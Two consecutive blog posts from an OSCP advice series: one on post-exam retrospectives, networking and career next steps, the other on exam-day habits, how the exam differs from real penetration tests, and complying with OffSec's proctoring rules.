In the final post of this series, I’ll discuss what to do after your latest exam attempt to get the most value out of your OSCP journey.

DISCLAIMER:

All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

Throughout this series, I’ve shared practical advice for PEN-200: Penetration Testing with Kali Linux students seeking to maximize the professional, educational, and financial value of pursuing the Offensive Security Certified Professional (OSCP) certification. So far, I’ve focused on four distinct phases of “the OSCP journey”: 1) pre-enrollment preparation, 2) the course material, 3) the lab networks, and 4) the exam. In this final post, I’ll discuss how students can leverage their most recent exam experience to learn from their mistakes and increase their chances of passing the exam on subsequent attempts. I’ll also share guidance for newly certified OSCP professionals on how to continue their cybersecurity journey with purpose and direction.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

After the Exam…

“To finish the moment, to find the journey’s end in every step of the road, to live the greatest number of good hours, is wisdom.” — Ralph Waldo Emerson

What you do after each OSCP exam attempt carries both short- and long-term implications for your professional success. Here are the three takeaways from this post:

1. Pass or fail, every student should conduct a thorough retrospective of their last exam attempt to determine what went well, where to focus future study efforts, and what productivity sinks to eliminate
2. For students still trying to pass the exam, connecting with others can inspire new strategies, uncover useful training resources, and impart valuable insight; certified professionals can also use this network for career support and guidance
3. The final piece of advice in this series is simply to reflect on your OSCP journey so far and decide what you want to pursue next, whether that’s further self-guided study, a new certification, or a job transition

Conduct an Exam Attempt Retrospective

After your OSCP exam—whether you passed or not—the most valuable thing you can do is pause and unpack what actually happened. For students still pursuing the certification, the benefit is clear: increasing the odds of passing the next attempt. However, even newly certified professionals can gain valuable insight by identifying areas for improvement or exam-day “bottlenecks” that hindered productivity. In this section, I propose a structured retrospective methodology, defined here as a deliberate and reflective review of your performance with the goal of identifying what worked, what failed, and what to improve. You can think of it as a technical postmortem of your latest exam attempt.

It took me three attempts to pass the OSCP exam. In my first attempt, I performed well on the standalone machine set but struggled with lateral movement and privilege escalation in the Active Directory (AD) set. I assumed my only obstacle was a lack of familiarity with AD attack vectors, so I rewrote my notes for the appropriate PEN-200 modules and practiced more with AD network exercises. Had I conducted an exam retrospective, however, I would have uncovered several other weaknesses in my approach:

• An underdeveloped external reconnaissance methodology
• Poor tradecraft documentation
• Suboptimal time management

My second attempt resulted in an even poorer performance (I exfiltrated only a single flag) despite being better informed on AD internals. Needless to say, I was shocked and profoundly disappointed.

After pulling myself out of that slump, I mulled over my latest attempt and used the lessons I’d learned to perform significantly better on my third and final try. With that success in mind, I revisited my retrospective process and refined it for this blog series. The workflow is illustrated in the swimlane flowchart diagram below:

The first, and arguably most important, phase of the exam retrospective is data gathering. The quantity, quality, and accuracy of the data you collect at this stage largely determines the retrospective’s value. By the end of this phase, you should have two core outputs that will inform the next stages of analysis:

• Timeline: Reconstruct your exam attempt as accurately as possible by capturing timestamps of your actions; break down each event by challenge set, machine, attack stage (e.g., reconnaissance, privilege escalation, lateral movement), and report status
• Machine Breakdown: Review your notes to identify the observable technologies on each of the six exam machines; note the services discovered, attacks or procedures attempted, tools used, and where you stopped along each attack path

After completing the data gathering phase, take a two-pronged approach to the analysis phase:

1. Identify operational hurdles that ate into your 24-hour testing window and hampered productivity using the exam timeline
2. Use the machine breakdowns to identify which technologies, tools, or attack stages hindered your exam performance

The goal in both cases is to enumerate deficiencies you can address later in the reconstruction phase. During reconstruction, you will build on your findings by 1) creating a targeted study plan, 2) reorganizing your notes, reference guides, or report templates, and 3) refining your testing methodology and time management strategy.

Start by analyzing your exam timeline and using your observations to guide improvements in your preparation:

1. Did one challenge set (i.e., the AD or independent challenges) take significantly longer than the other or remain incomplete?

This could signal a technical knowledge gap in areas like AD enumeration, Windows/Linux exploitation, or web application testing. If so, adjust your study plan to focus deliberately on these topics before your next attempt. Platforms like Hack The Box (HTB) allow you to filter machines by technology, operating systems (OS), or attack type; making it easier to target weak areas and reinforce essential skills.

2. Did missing or incomplete notes, fragmented reference guides, or disorganized report templates cause you to lose time?

If you struggled to retrieve commands or documentation under pressure, it’s time to streamline your tradecraft resources. Consolidate your notes, build out your reference guides, and prep your report templates in advance to minimize exam-day friction.

3. Did you fall into time sinks or go down rabbit holes that led nowhere?

Reflect on how your methodology might have contributed to wasted time. Consider introducing more automation, pruning redundant steps, or adopting a timeboxing approach like the Pomodoro Technique to improve your efficiency.

In the second step of the analysis phase, use the exam machine breakdowns you created earlier to answer the following questions and develop action items:

1. Did you fail to exploit or enumerate any technologies or services?

Use these insights to shape a focused study plan. Again, utilize platforms like HTB and prioritize practical training resources to dictate your informed study approach.

2. Did you discover a vulnerability but fail to exploit it due to tool issues or syntax errors?

Explore alternative tools that better align with your workflow and update your reference guide with accurate syntax and usage examples. Link entries in your reference guide for given exploitation techniques to examples of HTB or OffSec lab machines where you successfully executed those techniques. Aim to maintain at least two tools for each post-exploitation task: one that runs from your Kali Linux box and another that you can execute on a compromised host (e.g., a PowerShell script or .NET assembly). Apply the same principle to external recon tasks. Keeping your toolkit diverse and your notes accurate can save critical time under pressure.

3. Did specific attack stages (e.g., external reconnaissance, privilege escalation, credential harvesting) not return actionable results or break down?

Revisit and revise your methodology. Resources like HackTricks and Swissky’s cheatsheets can help close knowledge gaps. Add checkboxes or mind maps to your processes for common services (e.g., FTP, SMB, and HTTP) to ensure thorough and repeatable enumeration. Apply the same structured approach to post-exploitation workflows for both Windows and Linux targets. Test your updated methodology against easy-to-medium HTB machines to validate your changes before the next attempt.

By the end of both analyses, you should have a concrete plan to address the weaknesses exposed during the retrospective. If you’re still preparing for the OSCP—or simply want to gauge your progress—allocate time to retest your skills and methodology after completing your action items. If you followed my advice from the third post of this series and haven’t yet completed one of the three PEN-200 lab networks that simulate the exam environment, now’s the time. Treat the lab network as your control environment and your new score as the dependent variable: the measurable outcome of your adjusted approach. Once you’re satisfied with the results, reschedule your next OSCP exam attempt.

By following this approach, PEN-200 students will be better prepared for future OSCP exam attempts and better equipped to continue their self-guided education after earning the certification. This methodology can be applied as an iterative feedback loop across multiple attempts, helping to identify skill gaps and drive continuous improvement. As long as students maintain a positive attitude and a genuine interest in self-discovery, they can expect steady progress in both exam performance and testing confidence.

Network With Industry Professionals and Fellow Students

Throughout the OSCP study process, it’s easy to become hyperfocused and socially isolated. In doing so, students often miss out on one of the PEN-200’s greatest strengths: its expansive network of peers, mentors, and potential professional contacts. Whether you’ve already earned your OSCP or are still working through the exam process, connecting with others can transform the solitary grind of preparation into a collaborative, enriching journey and accelerate your professional aspirations.

As a current PEN-200 student, networking offers opportunities to learn, share, and stay motivated. After I failed my second attempt, I reached out to a friend enrolled in PEN-300: Advanced Evasion Techniques and Breaching Defenses and asked if I could shadow him while we both worked on HTB Pro Labs. During those sessions, we swapped enumeration checklists, shared our favorite tools, and discussed our approaches to exam retrospectives. Other students can benefit from networking by finding accountability partners, joining study groups, discovering new exploitation strategies, and staying emotionally grounded throughout this challenging process.

NOTE:

One of my favorite takeaways from shadowing mock penetration tests was learning how to speed up directory brute-force enumeration on Windows Internet Information Services (IIS) web servers. Because Windows hosts are case-insensitive—unlike UNIX-like systems—you can significantly reduce redundancy and improve performance by using tools like gobuster or dirsearch with a wordlist limited to lowercase or uppercase entries. This is just one example of how collaborating with other OffSec students or ethical hackers can inspire new testing strategies and accelerate your learning process.

For newly certified OSCP holders, networking takes on renewed importance. Earning the certification opens doors to job opportunities, interviews, and professional conversations that weren’t accessible before—but you can’t expect to walk through them without making connections first. Talking with people who are deeply embedded in the industry also provides insights that static courses can’t realistically capture like real-time knowledge about evolving roles, industry or specific company expectations, and career path requirements that wax and wane with industry trends. Networking also helps you plan the next phase of your self-guided education—whether that means expanding on PEN-200 concepts, charting your own course by exploring new cybersecurity domains, building a home lab, or other ideas I’ll cover later in the post. Conversations with those who’ve already moved beyond PEN-200 can help you set clear goals, avoid common pitfalls, and stay aligned with the rapidly evolving demands of the offensive security industry.

The most obvious networking platform for PEN-200 students is the official OffSec Discord server, but many other communities are worth exploring:

• Discord Servers: HackTheBox, TryHackMe, Kali Linux & Friends, and DEFCON host active pocket communities of current and former PEN-200 students
• OffSec Office Hours: The OffSec Discord hosts weekly livestreams on Fridays where an instructor walks through an OffSec Proving Grounds machine; these sessions are a great way to stay sharp and engage with other OSCP-hopefuls
• Reddit: The r/oscp subreddit focuses specifically on OSCP-related content, though the quality and tone of posts can vary (it is Reddit, after all)
• Content Creators: Figures like IppSec, The Cyber Mentor, and Tib3rius regularly produce livestreams and educational material, maintaining active online communities where you can connect with like-minded learners
• LinkedIn: Many OffSec students use LinkedIn to showcase their OSCP certification, share their learning journeys, comment on others’ milestones, and build professional relationships
• In-Person Events: Local meetups such as OWASP Local Chapters, Security BSides events, or regional DEF CON Groups are great places to find a supportive community, sharpen your skills, define a new career path, and potentially meet future travel partners for a trip to the world-famous DEF CON conference in Las Vegas

Discord - Group Chat That's All Fun & Games

Whether you’re newly certified or still grinding to earn the OSCP, don’t neglect the networking opportunities this journey presents. As a current student, sharing tips and hurdles keeps you technically informed and motivated. As a newly minted OSCP, connecting with career mentors and peers reinforces your knowledge and expands your professional circle. By engaging in Discord servers, study group meetups, or LinkedIn discussions, you gain real-time insights, accountability, and a support network that lasts well beyond the exam. No matter where you are in the OSCP journey, investing time in these communities accelerates your learning and lays the groundwork for long-term success in offensive security.

Ask Yourself, “What’s Next?”

I would like to take a moment to personally congratulate everyone reading this who has recently passed the OSCP exam. You’ve likely invested months—if not years—into earning this credential, amassing a solid foundation of experience and knowledge along the way. Ask yourself: What did you enjoy most? What would you prefer to avoid in the future? These reflections can guide your next challenge, the skills you want to sharpen, and your broader career direction. To close out this series, I’d like to explore those possibilities and highlight how they can enhance your professional profile.

First things first: take a break. Seriously. You’ve reached an impressive milestone and while it’s tempting to dive immediately into the next pursuit, give yourself time to rest and decompress. If possible, take a vacation (or at least a few days off) to recover from the intensity of exam prep.

Before deciding what’s next, update your resume to include your OSCP certification and prepare for the job hunt. If you’re entering the cybersecurity job market, I highly recommend the Infosec Job Hunting w/ BanjoCrashland YouTube playlist. It covers everything from finding job postings and writing resumes to networking and interview preparation. Many of the techniques discussed in this series involve open-source intelligence (OSINT) gathering techniques, which can double as skill development for future offensive roles. The creator, Jason Blanchard of Black Hills Information Security, also hosts a weekly Twitch stream, Job Hunt Like a Hacker, which expands on these lessons with real-time advice and feedback. While I haven’t attended the stream personally, at least 278 people (as of this writing) credit Blanchard and his content for helping them successfully pivot into cybersecurity—an endorsement of both his insight and the supportive community he’s fostered.

Many OSCP holders choose to write a public reflection on Medium, LinkedIn, or a personal blog platform. If you do the same, structure it like a retrospective: document what went well, what didn’t, how you studied, and what you would change in hindsight. Avoid spoilers, walkthroughs, or anything that could violate OffSec Terms and Conditions. A well-written reflection not only inspires other PEN-200 students but can also serve as a networking tool, a technical writing sample, and a resume booster. Take your time writing it and ensure it’s something you’re proud to attach your name to.

This whole series has focused on one cybersecurity certification (the OSCP) and briefly mentioned a few others. In spite of that, I recommend caution before making another certification your next professional goal. As I said in the first post of this series, it’s important to view all certifications through a critical lens. The certification industry is, ultimately, a business and students should remain conscious of marketing narratives that inflate their importance or imply that earning one guarantees employment in your field of choice. Rather than chasing credentials to bypass every human resources (HR) filter—a Sisyphean task, in my opinion—focus instead on crafting a narrative of steady, deliberate growth in your ethical hacking journey. That narrative can include certifications, but it could also highlight personal projects, practical experience, and self-guided exploration. In short, learn to wield certifications like a scalpel rather than a claymore while also peppering your journey with cost-effective resume boosters.

For example, many offensive security professionals pursue the Certified Red Team Operator (CRTO) or Offensive Security Experienced Penetration Tester (OSEP) after earning the OSCP. Equally valid (and often more cost-effective) alternatives include climbing the ranks on HTB, developing your own command and control (C2) framework, or participating in bug bounty programs like HackerOne or Bugcrowd. A few strategic acronyms on your resume can open doors, but too many can spell doom for your wallet.

PEN-200 offers valuable lessons, but it’s still an entry-level certification and only scratches the surface of many cybersecurity topics. If you want to build on its concepts at a higher level, consider the following:

• Web Applications

While PEN-200 introduces core techniques like SQL injection (SQLi) and cross-site scripting (XSS), the web app security field itself spans hundreds of server-side and client-side vectors, subtle edge cases, and novel exploitation methods that researchers are constantly discovering. PortSwigger Academy is my favorite free platform for advancing these skills, as it offers comprehensive written material and interactive labs.

• AD Attack Vectors

AD represents a massive attack surface and the PEN-200 therefore covers only the fundamentals while omitting topics like Kerberos delegation, Active Directory Certificate Services (ADCS), and Microsoft Configuration Manager (MCM/SCCM). Use BloodHound Community Edition as both an addition to your toolkit and a knowledge base for improving AD tradecraft.

• Reporting

As mentioned in the third post of this series, technical reporting may be the most transferable skill from the PEN-200 into real-world engagements. Refer back to the included resources in that article and set time aside to improve this area.

• Red Teaming

While red teaming overlaps significantly with penetration testing, it emphasizes different skills such as persistence, command and control, and exfiltration. Explore techniques relative to these domains and learn how to adapt each PEN-200 post-exploitation technique to blend with legitimate network traffic, enhancing stealth.

NOTE:

The differences between penetration testing and red teaming are often subtle and vary between organizations. Understanding these nuances is crucial when entering the job market, as mismatched expectations can hinder a successful career pivot. My favorite explanation comes from JUMPSEC, which notes that penetration testing aims to uncover as many flaws as possible, while red teaming focuses on achieving specific objectives to demonstrate real-world impact. Red teaming also places greater emphasis on operational security (OPSEC) evasion and threat actor emulation.

There are even more offensive security topics not covered in PEN-200 that may interest you:

• Cloud Security

Just as pervasive as web applications, cloud platforms—such as Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure—present huge attack surfaces. HackTricks Training is a relatively new but solid starting point for offensive cloud security training.

• Wireless Security

While access to PEN-210: Foundational Wireless Network Attacks and an OffSec Wireless Professional (OSWP) exam voucher are available to OffSec Learn One subscribers, you might try the free WiFiChallenge Lab first before enrolling in another certification program.

• Malware & Payload Development

Maldev Academy and SEKTOR7 Institute come highly recommended throughout the industry. The skills these courses help you develop are essential to advanced post-exploitation, red teaming, and custom implant engineering.

• Other Domains

Other common domains are mobile devices and applications, industrial control systems (ICS), Internet of Things (IoT) devices, large language model (LLM) web applications, social engineering, and physical access control systems (PACS).

I wrote this series for PEN-200 students whose goal is to pivot into the offensive security consulting industry; however, that is only one demographic of the PEN-200 student body. Many students pursuing the OSCP are considering (or already employed in) fields tangential to penetration testing and red teaming. If you’re more aligned with adjacent fields like reverse engineering, development, security, and operations (DevSecOps), security operations center (SOC), or detection engineering, there are valuable resources for those too:

• Reverse Engineering & Malware Analysis

Try Malware Unicorn’s Reverse Engineering 101 or HackerSploit’s Malware Analysis Bootcamp for free, the latter of which concludes with case studies of artifacts from the 2018 Flare-On Challenge capture the flag (CTF) event and the cyberweapon Stuxnet (used during the sabotage campaign of Iranian nuclear enrichment facilities known as Operation Olympic Games).

• DevSecOps

I highly recommend the corporate training program Secure Code Warrior or the more affordable Hacksplaining platform for individuals looking to improve their secure development skills.

• SOC

SOC analysts are often on the front lines of incident detection and response. Utilize online training platforms like CyberDefenders or TryHackMe, both of which offer learning paths for SOC levels 1–3. Radiant Security has a helpful explanation of the differences between these tiers.

• Detection Engineering

Now that you understand how many fundamental attacks work, flip the perspective by learning how to detect malicious behavior, craft alerts, and better understand attacker tradecraft. Budget-conscious learners can start with Practical Threat Detection Engineering from packt and its accompanying code repository, while Applied Network Defense offers a well-regarded catalog for those seeking deeper coverage.

• Other Domains

Other common domains are digital forensics and incident response (DFIR), governance, risk, and compliance (GRC), and threat intelligence gathering (AKA threat hunting).

NOTE:

As with all commercial training options, consider whether the return on investment (ROI) justifies enrollment.

Lastly, consider how you might participate in or give back to the information security community. If you live in or near a city, look for volunteer opportunities as a technical coach for underrepresented communities (e.g., older citizens, non-native English speakers, or individuals with physical or cognitive disabilities) or as a volunteer network engineer for nonprofit organizations. Consider volunteering at a local public school to talk about careers in cybersecurity and what drew you to ethical hacking. Many diversity-focused nonprofit organizations and affinity groups in cybersecurity offer valuable resources like career mentorship, CTF events, digital privacy training, and financial sponsorship for professional development. Notable examples include Women in Cybersecurity (WiCyS), Blacks in Cybersecurity (BIC), Latinas in Cyber (LAIC), Secure Diversity, and Minorities in Cybersecurity (MiC). Getting involved with these groups can expand your network, strengthen your resume, and allow you to give back to the community in meaningful ways.

Earning the OSCP is an extraordinary accomplishment, but it’s just one checkpoint in a much longer and more worthwhile journey. Whether you continue with more certifications, lab projects, or community involvement, remember to stay curious, humble, and ethical. Make your next steps intentional, and remember: as with the OSCP, the process itself should be as rewarding as the prize.

Conclusion

It’s been a privilege to write this series and I’m grateful to my colleagues and friends for their valuable feedback and ongoing support. As always, I welcome your questions, constructive critiques, or additional advice for current and future PEN-200 students in the comments.

Getting the Most Value Out of the OSCP: After the Exam was originally published in Posts By SpecterOps Team Members on Medium, where people are continuing the conversation by highlighting and responding to this story.

A practical guide to maximizing the short- and long-term benefits of your upcoming OSCP exam attempt(s).

DISCLAIMER:

All opinions expressed in this article are solely my own. I have reviewed the content to ensure compliance with OffSec’s copyright policies and agreements. I have not been sponsored or incentivized in any way to recommend or oppose any resources mentioned in this article.

Introduction

In the last post in this series, I discussed a few proactive steps students should take throughout the PEN-200: Penetration Testing with Kali Linux labs as part of their efforts to earn the Offensive Security Certified Professional (OSCP) certification. In this entry, let’s focus on test day itself—and how to maximize the educational, financial, and professional value of the OSCP exam experience.

PEN-200: Penetration Testing Certification with Kali Linux | OffSec

During the Exam(s)…

“You may be disappointed if you fail, but you are doomed if you don’t try.” — Beverly Sills

Congratulations—you’re now ready to take the OSCP exam! Despite being the shortest of the five phases in the “OSCP journey”, there are still important steps you can take to ensure you’re getting your money’s worth. Here are three key takeaways for all future exam-takers:

1. The OSCP exam is designed to mimic a black-box penetration test, but due to the nature of standardized testing, it inevitably falls short of being a perfect replica of a real-world engagement; while this is completely reasonable, it helps to be prepared to speak to these nuances in future job interviews and not to confuse exam-specific tactics with best practices in the field
2. Certification exams—for better or worse—play a role in many offensive security consulting careers, so it’s best to set a precedent for sustainable and practical test-taking behavior by developing realistic, ethical, and repeatable exam-day practices and using them during your OSCP attempt(s)
3. Follow OffSec’s exam-day instructions to the letter, as even minor deviations could invalidate months (or years) of work toward the OSCP and may disqualify you from future OffSec certifications

Understand the Differences Between the OSCP Exam and Real-World Practice

While the OSCP exam certainly tests your offensive security knowledge, it’s important to understand what the exam is and isn’t. OffSec has gone to great lengths to make the OSCP a realistic simulation of a black-box penetration test; however, to ensure fair grading and timely results, it comes with inherent limitations. By recognizing these gaps ahead of time, students can better interpret their exam experience, set realistic expectations for future consulting roles, better articulate their skills in interviews, and avoid drawing the wrong conclusions about what the certification does (or doesn’t) prove to a technical recruiter.

While not an exhaustive list, here are the differences I consider the most significant to keep in mind:

• Team Collaboration: Although the OSCP exam is a solo endeavor, operators seldom work alone in real-world engagements; exceptions may exist for engagements with extremely limited scope or niche objectives, but most involve at least two consultants

• Client Interaction: During the exam, your only contact is with the OSCP proctor(s); in a real engagement, you should expect to interact with business managers, engineers, security operations center (SOC) employees, and a designated point of contact (POC) throughout the lifecycle of a client-consultant relationship
• Scope Definition and Rules of Engagement (ROE): While the Exam Restrictions in the exam guide could be interpreted as a partial ROE, real-world assessments include far more comprehensive documentation and legal implications for its violations; consultants may also be involved in negotiating the scope of upcoming engagements
• Engagement Objectives and Metrics: The objective of the OSCP exam is to gain initial and elevated access to as many systems as possible; in contrast, real-world assessments—especially red team exercises—may involve more targeted objectives, like exfiltrating dummy data, compromising specific users or systems, bypassing defenses, or demonstrating how vulnerabilities are tied to business impact
• Operating with Due Caution: Whereas the OSCP exam gives candidates near-total freedom within the simulated network (aside from a few restricted attacks and tools), real-world consultants must consider the impact of their actions on live systems and people, adapting their approach as needed; consultants will often request POC approval before executing commands that could trigger account lockouts or system downtime
• Deconfliction: If an attack is detected, SOC teams may raise a deconfliction event to confirm it was part of the assessment; if not confirmed, the alert could trigger a full-scale incident response process

• Post-Engagement Procedures: After the OSCP exam, the student’s only obligation is to submit a report; in contrast, wrapping up legitimate consulting engagements may involve artifact cleanup, resolving deconfliction events, stakeholder presentations, blue team debriefs, infrastructure teardown, and secure data destruction
• Cloud-Hosted Tools: Using third-party or cloud-hosted tools to process clients’ artifacts—such as for reverse engineering, data exfiltration, or hash cracking—carries the risk of exposing secrets to systems beyond client or consultant control; because the OSCP exam uses entirely fictional data, its restrictions around cloud usage are more flexible
• Timeline: The OSCP exam splits the practical and reporting components into two ~24-hour phases that test a candidate’s ability to rapidly identify, exploit, and document vulnerabilities; in contrast, real-world engagements typically span several weeks per phase depending on scope and client expectations

• Threat Modeling: Some assessments require consultants to emulate specific threat actors by using a tailored subset of tactics, techniques, and procedures (TTPs); during the OSCP, students are not bound by these constraints
• Kali Linux Requirement: The OSCP must be completed using a Kali Linux VM, but while Kali is a popular Linux distribution for ethical hacking, its large toolset increases both operational overhead and the probability of detection; real-world operators often use custom minimal Linux builds with obfuscated toolkits deployed via continuous integration and continuous delivery/deployment (CI/CD) pipelines to reduce both detection risk and scaling costs
• Social Engineering: While the OSCP exam may involve limited client-side attacks (an assumption based on the fact that there is a “Client-Side Attacks” module in the publicly available syllabus), its highly automated structure means it offers few opportunities to exploit the weakest link in any cybersecurity program: the human element; in real-world assessments, consultants may use tactics like spear-phishing, vishing, or smishing (if the ROE permits it) to achieve credential access or arbitrary code execution (ACE) capabilities
• Physical Security: Some assessments allow physical intrusion tactics—such as piggybacking/tailgating or lock-picking—to gain access to critical infrastructure and test physical security controls; while not feasible during the OSCP exam and somewhat niche, it’s still valuable to conceptually understand these attack vectors

The OSCP is an achievement to be proud of, but it doesn’t perfectly mirror professional practice. Keeping these differences in mind, students can more accurately frame their OSCP experience, communicate their skills more effectively, and set realistic expectations for job responsibilities. Recognizing its limitations is a critical step toward bridging the gap between certification and your career.

Develop Healthy Exam Habits

If this is your first multi-day practical exam, it’s best to build healthy habits and eliminate disruptive ones early. This sets you up for long-term success and a better experience in future exams, regardless of which certification you’re pursuing.

The OSCP exam, for those unfamiliar, is a grueling ordeal. It begins with a 23-hour, 45-minute technical assessment where the student must exfiltrate a minimum number of flags from six machines. Three of these are standalone targets that require the student to complete the full attack path—from initial access to privilege escalation. The other three form an Active Directory (AD) set, where the student is ceded access as a lower-privileged user and escalates to Domain Admin or equivalent-level access. To pass, students must capture enough flags to reach at least 70 out of 100 points (each flag is worth 10 points). They’re then given ~24 more hours to submit a professional report detailing how they achieved each objective. Needless to say, it’s an exhausting endeavor and a major source of stress for many.

As painful as it is to admit, the OSCP—for all its notoriety and difficulty—is considered an entry-level certification in offensive security consulting. It covers a wide breadth of knowledge but ultimately scratches the surface of or doesn’t attempt to address topics like evading operational security (OPSEC) solutions, deploying and maintaining command and control (C2) infrastructure, and identifying more advanced vulnerabilities, to name a few. While certifications aren’t strict gatekeepers to the industry or career advancement, an employer may eventually require you to pursue more advanced practical exams (or you may feel pressured to do so to stay competitive in the job market). With that in mind, and especially if the OSCP is your first multi-day practical exam, it’s in your best interest to develop sustainable exam habits early on to avoid building a detrimental relationship with certifications.

Let’s start with the simplest, yet arguably hardest, topic: sleep. While it may be tempting to pull an all-nighter and grind through flags as quickly as possible, this approach is likely counterproductive. Research consistently show that sleep deprivation impairs cognitive functioning, stifles creativity, and slows reaction times—all of which are essential during the OSCP exam. Some studies even suggest that sleeping more than usual the night before a test is correlated with better performance. For multi-day exams, I aim for at least eight hours of sleep each night, regardless of how much progress I made the day before. If you’re interested in the science behind sleep, I highly recommend Why We Sleep by Matthew Walker, PhD.

Your exam success largely depends on the quality of your notes. Make a habit of taking structured, detailed, and legible notes throughout your technical challenges. Consider building a note template in a node-based application like Obsidian and refining it during a few PEN-200 Challenge Labs or Hack the Box (HTB) machine exercises. The more structure you establish in advance, the more mental bandwidth you preserve on exam day. Effective note-taking is a transferable skill that strengthens both your technical execution and report-writing abilities as an offensive security consultant.

A few days before an exam, I like to deep clean my office—starting with vacuuming the floors and finishing by decluttering my workspace. A minimalist setup not only supports compliance with OffSec’s exam policies (more on that later), but also fosters a calmer mental space where you can think clearly and move efficiently. I also recommend silencing your phone, placing it out of reach, notifying others that you’ll be unavailable, and using noise-canceling headphones if you’re in a shared household. The fewer distractions in your space, the easier it is to focus on solving complex problems.

The tight 24-hour window of the OSCP exam demands a strategic approach to time management. Techniques like the Pomodoro Technique—working in focused sprints followed by short breaks—can help prevent burnout and minimize the risk of losing hours chasing rabbit holes. Even if you choose not to use a formal time-management method, entering the exam with a clear plan is far more effective than charging in with a purely reactive mindset. Some approaches that merit attention include capping your focus on a single challenge to 60-90 minutes before pivoting to another, or pre-allocating specific blocks of time to each machine/challenge set in the exam.

Your time-management strategy should also account for the maintenance of your own body: plan your meals in advance, step away from the screen while eating, and stay well hydrated. If possible, build in time on test-day for light aerobic activity—such as a quick jog, a walk with the dog, or a short set of bodyweight exercises like jumping jacks, mountain climbers, or burpees. Brief physical movements can help re-energize your mind, reduce stress, and boost cognitive performance.

To help anchor your experience and reduce anxiety, consider designing personal pre- and post-exam rituals. The night before, do something relaxing—like casually reviewing your notes, solving an easy HTB machine, or writing encouraging Post-it notes to stick on your wall. Set your clothes, snacks, and water up like you’re getting ready for a marathon—because in many ways, you are. After the exam, give yourself a buffer to recover, reflect, and decompress. Personally, I like to go out with friends, play nostalgic video games, or grab a Guinness. Whatever your rituals look like, make them personal and genuinely rewarding.

Finally, I encourage all students to embrace the result of the exam, pass or fail. The OSCP is not the final word on your skills—it’s a checkpoint, not a verdict. In fact, failing by a narrow margin can often be more educational—and ultimately more empowering—than barely passing. By adopting a growth mindset, you can view a missed attempt not as a reflection of your limitations, but as an opportunity to walk away with clearer insight into your strengths and gaps. This self-awareness can be carried with confidence into job interviews, real-world engagements, and the refinement of your study plan. We’ll explore this topic more deeply in the next post.

Building sustainable and empowering exam habits isn’t just about getting through a difficult 24 hours; it’s about establishing a process you can carry into future certifications, real-world assessments, and high-stakes professional challenges. By developing tenable and fulfilling exam-day practices with intent, you give yourself the best possible chance to succeed—not just in the exam, but in the career that follows.

Don’t Risk Your Exam Attempt

The OSCP certification is a multi-thousand dollar investment, so the last thing any student wants is to have their attempt invalidated due to a preventable mistake or misunderstanding that results in an accusation of academic misconduct. Rather than viewing the exam solely as a test of technical skill, candidates should approach it as a professional engagement with clearly defined operational and ethical boundaries. To safeguard the time, effort, and money you’ve invested in the OSCP journey, it’s imperative to read every instruction carefully, double-check your testing environment, and follow OffSec’s exam-day guidelines to the letter.

As one of the most recognized credentials in cybersecurity, the OSCP carries significant industry weight—and OffSec therefore takes the integrity of its exam process seriously. In 2018, in response to growing concerns about cheating, OffSec introduced an online proctoring system to the exam. Candidates are required to verify their identity with a government-issued ID and maintain continuous screen sharing and webcam visibility during the first ~24 hours of the exam.

In 2019, an individual using the handle cyb3rsick publicly released write-ups for several [now retired] OSCP exam machines, reportedly in protest of the exam’s format, which they claimed “allowed thousands of [students] to cheat and pass the exam”. Coverage of the incident highlighted both the controversy and the industry’s reaction. In response, OffSec published a blog post that provided insight into the organization’s anti-cheating measures. These include: relying on community reports, monitoring suspicious groups or individuals, modifying exam systems on a “regular basis”, using undisclosed detection mechanisms during grading, and online proctoring. Most notably, OffSec emphasized that cheaters may face severe consequences—including potential legal action. As stated in their post, “cheaters have lost their certs, paid fines, lost their jobs, and been embarrassed in front of their peers”.

Some stories involving failed exam attempts, revoked certifications, or bans appear to stem from accidental missteps rather than deliberate misconduct. While it’s clear that OffSec has taken meaningful action against individuals who have knowingly violated academic integrity policies, it’s also reasonable to acknowledge that some cases may result from honest mistakes, misunderstandings, or technical issues. One example occurred in 2019, when a student used the common Linux/Unix* post-exploitation enumeration tool, LinPEAS, during their exam. At the time, a recent update to the script had introduced an auto-exploitation feature, which resulted in the student escalating privileges immediately on the target host. Because the Exam Restrictions prohibit the use of tools with auto-exploitation capabilities, the student initially received a failing grade. OffSec later addressed the incident in a blog post, and the student reportedly had their result overturned and was awarded a passing grade. There have also been multiple incidents of students losing their certifications after their private exam reports were leaked or stolen and subsequently used by others to cheat—an issue OffSec has acknowledged in their Support Portal.

This section is not intended to criticize or undermine OffSec’s authority to vigorously pursue cases of academic misconduct or copyright infringement, but rather to inform aspiring OSCP-certified professionals—especially those acting in good faith—on how to conduct themselves confidently and transparently on exam day.

To align with OffSec’s expectations for a successful exam day, I recommend the following:

• Revisit the OSCP Exam Guide and PEN-200 Reporting Requirements a week or two before your exam; consider incorporating them into a Requirements or Rules of Engagement section in your report template to reinforce them into memory
• Keep the proctoring window visible at all times, reply promptly to requests, and reconnect your camera immediately if it becomes disconnected
• Remove unnecessary items from your workspace, such as additional screens (OffSec permits up to four monitors during the exam), notebooks, smart devices, or inactive laptops
• Store your phone in a separate room and notify others that you’ll be unreachable during the exam

• Before the exam, take inventory of your toolkit and review each utility’s documented functionality to ensure it doesn’t include features that OffSec prohibits (e.g., spoofing, automatic exploitation, commercial services) and keep a record of any new tools you use during the exam; this level of caution is also applicable to real-world engagements, where it is important to fully understand the behavior and implications of the tools you deploy in a client environment
• Keep all notes local; avoid accessing documents stored on cloud platforms (e.g., GitHub, GitLab, or OneNote)
• Terminate unnecessary screen-sharing programs (e.g., Discord, Zoom, Teams); even idle background processes can raise red flags
• Use a single device and identity throughout the exam; ensure the name on your ID matches your OffSec registration details, complete the exam on a single authorized system, and terminate any third-party virtual private network (VPN) applications—as changing IP addresses mid-exam may be interpreted as location switching

• Minimize physical and digital movement; don’t leave the camera’s view without telling the proctor, and avoid switching desktops, using unrelated virtual machines (VMs), or removing hardware devices
• Never download artifacts from the exam environment to your local machine; all work should remain within your VM
• Be mindful of physical cues that might appear suspicious on camera, such as repeated glances away from the screen, whispering, interacting with unmonitored people, or unexplained movements

• If you’re referencing notes from a previous attempt, inform the proctor to distinguish it from reused or plagiarized content
• Have a backup device and mobile hotspot ready in case of system failure or internet loss
• Consider creating a clean system user profile just for the exam to reduce redundant applications and protect your privacy

